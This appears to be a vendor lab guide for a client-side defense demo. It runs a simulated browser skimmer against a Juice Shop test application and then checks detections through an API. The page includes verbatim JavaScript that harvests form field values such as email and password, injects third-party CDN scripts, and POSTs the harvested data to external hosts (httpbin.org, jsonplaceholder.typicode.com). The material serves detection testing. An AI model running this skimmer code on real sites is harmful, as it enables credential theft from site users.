Phase 2 — Attack

Phase 2 generates simulated attack traffic against the protected application and confirms CSD detected it. Phase 1 must be complete — all Step 7 checks PASS — before proceeding.

Step 8: Attack Simulation

Note

This step requires browser-side JavaScript execution — curl cannot trigger CSD detection. AI assistants with browser automation tools (MCP Chrome DevTools, Playwright, Puppeteer) execute these steps directly using the AI-Automated Execution sequence below. Operators without browser automation perform the manual steps.

After the infrastructure is verified (all Phase 1 Step 7 checks PASS), run the attack simulation scripts to generate CSD detections. The scripts are defined in the Trigger Detection guide and the Attack Script Library.

AI-Automated Execution

AI assistants with browser automation tools run the attack simulation programmatically:

1. Navigate with initScript — first navigate to about:blank to ensure a clean document context (avoids stale initScripts from prior navigations), then navigate_page to http://$F5XC_DOMAINNAME/#/login with an initScript that saves native setInterval, clearInterval, fetch, and console.log before zone.js patches them, polls for the login form fields, fills credentials via the native HTMLInputElement.prototype.value setter, and immediately executes the Combined Detection Script inline. Use the verbatim initScript below.
2. Dismiss Welcome Banner — press_key with Escape to close the Welcome Banner. On subsequent visits the banner may not appear (cookies persisted). The cookie consent dialog is dismissed automatically by the Escape key
3. Wait for completion — wait 10 seconds for all CDN script load/error callbacks and fetch promise resolutions to complete
4. Capture evidence — list_console_messages to check for [CSD Demo] Simulation complete and CDN load results; list_network_requests filtered to script and fetch types to verify HTTP status codes (200/201 for success, pending for held requests)

Phase 2 initScript (verbatim — use exactly as written):

// Save native references before zone.js patches them
var _si = window.setInterval.bind(window);
var _ci = window.clearInterval.bind(window);
var _fetch = window.fetch.bind(window);
var _log = window.console.log.bind(window.console);

// Poll for login form fields, fill credentials, run detection script
var _poll = _si(function() {
  var emailEl = document.querySelector('#email');
  var passEl  = document.querySelector('#password');
  if (emailEl && passEl) {
    _ci(_poll);
    // Fill credentials via native setter (bypasses zone.js)
    var nativeSet = Object.getOwnPropertyDescriptor(
      window.HTMLInputElement.prototype, 'value').set;
    nativeSet.call(emailEl, 'test@example.com');
    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
    nativeSet.call(passEl, 'P@ssword123');
    passEl.dispatchEvent(new Event('input', { bubbles: true }));

    // Run Combined Detection Script inline using native fetch for exfil
    (function() {
      _log('==================================================');
      _log('[CSD Demo] Combined Detection Script — Starting');
      _log('==================================================');

      _log('\n[Formjack] Phase 1: Form field harvesting');
      var inputs = document.querySelectorAll('input');
      var harvested = {};
      inputs.forEach(function(input) {
        var name = input.name || input.id || input.type;
        harvested[name] = input.value || '(empty)';
      });
      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);

      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
      var cdns = [
        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
      ];
      cdns.forEach(function(cdn) {
        var script = document.createElement('script');
        script.src = cdn.url;
        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
        document.head.appendChild(script);
        _log('[Supply Chain] Injected script tag: ' + cdn.name);
      });

      _log('\n[Exfil] Phase 3: Data exfiltration');
      var payload = JSON.stringify({
        type: 'combined_demo', credentials: harvested,
        page: window.location.href, timestamp: Date.now()
      });
      _fetch('https://www.httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
        .then(function() { _log('[Exfil] Data sent to www.httpbin.org'); });
      _fetch('https://jsonplaceholder.typicode.com/posts', {
        method: 'POST', mode: 'no-cors',
        headers: { 'Content-Type': 'application/json' }, body: payload
      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });

      _log('\n==================================================');
      _log('[CSD Demo] Simulation complete');
      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
      _log('==================================================');
    })();
  }
}, 300);

Caution

zone.js incompatibility — Juice Shop uses Angular’s zone.js, which patches setTimeout, setInterval, fetch, XMLHttpRequest, and other browser APIs. This breaks the MCP evaluate_script, fill, and click tools with Cannot read properties of undefined (reading 'call'). Use navigate_page with initScript instead — initScript runs before zone.js loads, so you can save native API references and use them in polling callbacks. The initScript must fill form fields using the native HTMLInputElement.prototype.value setter (not fill) and run the detection script inline (not via setTimeout, which zone.js may intercept after page load). See Trigger Detection — AI-Automated Execution for details.

Note

initScript accumulation — each navigate_page call with an initScript parameter adds the script to a persistent list that runs on every subsequent document load. To avoid stale scripts interfering, either navigate to about:blank between runs or use new_page with isolatedContext for a clean browser context.

Note

Saving native fetch in the initScript — the initScript saves window.fetch.bind(window) before zone.js patches it. This ensures fetch calls work correctly without zone.js Cannot read properties of undefined errors. The same initScript (with native fetch saved) is used for both Phase 2 and Phase 3 attack runs — CSD mitigation does not intercept fetch() calls, so saving the native reference does not affect mitigation behavior.

Caution

Transient origin 404 — on first navigation to the Angular application, polyfills.js or other app scripts may return a transient HTTP 404 from the origin server. This causes Angular to fail bootstrapping, resulting in a blank page with no login form. The 404 is ephemeral — subsequent requests return 200 or 304. Recovery: navigate to about:blank, wait 2 seconds, then retry the navigation. If the issue persists across multiple retries, check origin health via the load balancer path (curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js).

Manual Execution

Operators without browser automation tools perform the steps manually:

1. Navigate to the protected application login page: http://xF5XC_DOMAINNAMEx/#/login
2. Enter dummy credentials — type test@example.com in the Email field and P@ssword123 in the Password field (do not submit the form)
3. Open DevTools — press F12 and switch to the Console tab
4. Run the Combined Detection Script — paste the script from Trigger Detection — Run the Combined Simulation Script into the console and press Enter
5. Verify console output — confirm the [CSD Demo] phased output shows: field harvesting, script injection from 4 CDN domains, and data exfiltration to 2 endpoints

What Gets Triggered

Signal	Behavior	Detection
Form field harvesting	Reads email and password input values	Scripts reading sensitive form fields — flagged High Risk
Script injection	Injects 4 <script> tags from cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io	Up to 4 new third-party script domains detected (CDN availability varies)
Data exfiltration	Sends harvested data via fetch to www.httpbin.org and jsonplaceholder.typicode.com	Network calls to external domains

Note

CDN availability varies. Not all 4 CDN scripts will load in every run — browser resource limits, network conditions, or CDN throttling may cause some to fail with ERR_INSUFFICIENT_RESOURCES or timeout. The simulation succeeds if any CDN script loads. CSD detects the injection attempt regardless of whether the script loads successfully — the <script> tag creation itself is the detection signal.

In severe cases, ERR_INSUFFICIENT_RESOURCES can escalate to a page-level failure — the entire page goes blank, screenshots timeout, and take_snapshot fails. This typically occurs after multiple navigations with heavy initScripts accumulate in the same browser context. Recovery: use new_page with isolatedContext to create a fresh browser context, then retry from the about:blank → navigate_page with initScript sequence. This is distinct from individual CDN script failures, which do not affect simulation success.

Tip

After running the attack simulation, use this deterministic polling loop to wait for detections:

1. Query /detected_domains every 60 seconds
2. If DET-3 passes (exfil domains appear in /detected_domains), proceed to Step 9 immediately
3. If still empty after 10 queries (10 minutes), check CSD status (Phase 1 Step 5) and protected domain registration (Phase 1 Step 6) — one of these is likely misconfigured
4. If still empty after 30 queries (30 minutes), stop and report to operator — do not continue to Phase 3

For additional targeted simulations (individual attack categories, maximum detection stress test), see the Attack Script Library.

Evidence

The AI assistant should report the following. For AI-automated execution, evidence is captured programmatically via list_console_messages (the initScript’s polling function logs results to the console). For manual execution, the operator reads the browser console output.

Check	Expected	Status
Login page loaded	200 OK at http://$F5XC_DOMAINNAME/#/login	PASS / FAIL
Console script executed	[CSD Demo] Simulation complete in console output	PASS / FAIL
Fields harvested	Count > 0 in console output	PASS
Scripts injected	1–4 CDN domains in console output (some may fail with resource errors)	PASS if any CDN domain appears
Exfil channels	2 fetch POST attempts in console output	PASS

Tip

If the HTTPS LB certificate is valid (CertificateValid), you may optionally run the simulation against https://$F5XC_DOMAINNAME/#/login as well. This is not required for demo progression.

Step 9: Detection Verification via API

Query the CSD API endpoints to confirm detections appeared. Use the polling loop: query /detected_domains every 60 seconds; proceed as soon as DET-3 passes. If DET-3 does not pass after 10 minutes, check CSD configuration. If DET-3 does not pass after 30 minutes, stop and report to operator. These endpoints are documented in the API Reference and use the same authentication and namespace as previous steps.

Note

Endpoint processing order: /detected_domains is populated first and is the primary indicator that the CSD pipeline is working. /scripts and /formFields are populated on a slower backend processing schedule and may remain empty for 20–30 minutes even after multiple simulation runs. If /detected_domains shows exfil domains (www.httpbin.org, jsonplaceholder.typicode.com), treat the simulation as successfully detected and proceed — the DET-1 check below reflects this.

Detected Scripts

Query for scripts detected in the last 24 hours:

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s -X POST \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  -H "Content-Type: application/json" \
  -d "{\"startTime\": \"$START\", \"endTime\": \"$NOW\"}" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/scripts" \
  | jq '{total: (.scripts | length), scripts: [.scripts[]? | {script_name: .script_name, risk_level: .risk_level}]}'

Field	Expected	Status
total	> 0 (scripts detected)	PASS if > 0; PENDING if 0 but /detected_domains shows exfil domains
Script names	Includes CDN domains (cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io) in script_name	PASS if injected CDN domains appear

Detected Domains

curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/detected_domains" \
  | jq '{total_domains: .domain_summary.totalDomains, domains: [.domains_list[]? | {domain: .domain, category: .category}]}'

Field	Expected	Status
total_domains	> 0	PASS if > 0
Domain list	Includes CDN and exfil domains	PASS if expected domains appear

Form Fields

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/formFields?startTime=$START&endTime=$NOW" \
  | jq '{total: .total_size, fields: [.form_fields[]? | {name: .name, sensitivity: .analysis.value, scripts: (.associated_scripts | length), locations: .locations}]}'

Field	Expected	Status
total	> 0	PASS if > 0; PENDING if 0 but DET-3 passes
name	Includes email, password	PASS if sensitive fields appear
sensitivity	Sensitive for email/password fields	PASS if ML classified correctly

Note

Form field processing is slower than domain detection. The /formFields endpoint may return fields with partial metadata on first query. The ML sensitivity classification (Sensitive vs Not Sensitive) populates after backend processing completes — this can take 20–30 minutes after the first simulation run. If fields show but lack classification, requery later. DET-3 (/detected_domains) is the primary pass criteria.

Phase 2 Evidence Summary

After all detection queries, present the final detection status:

Test ID	Check	Status
DET-1	Scripts detected (/scripts endpoint)	PASS if > 0; PENDING if empty but DET-3 passes
DET-2	CDN domains detected	PASS / FAIL
DET-3	Exfil domains detected (/detected_domains)	Primary indicator — PASS if www.httpbin.org or jsonplaceholder.typicode.com appear
DET-4	Form fields detected (/formFields endpoint)	PASS if > 0; PENDING if empty but DET-3 passes

Note

Minimum pass criteria to proceed to Phase 3: DET-3 must PASS (exfil domains visible in /detected_domains). DET-1 and DET-4 may show PENDING on first use or after a fresh rebuild — this is normal. If DET-3 also shows FAIL after 30 minutes, verify CSD is enabled (Phase 1 Step 5), the protected domain is registered (Phase 1 Step 6), and the CSD JS tag is being injected (Phase 1 Step 7 JS Configuration check).

---

Phase 2 complete. Proceed to Phase 3 — Mitigate to apply mitigation rules and verify domains are blocked.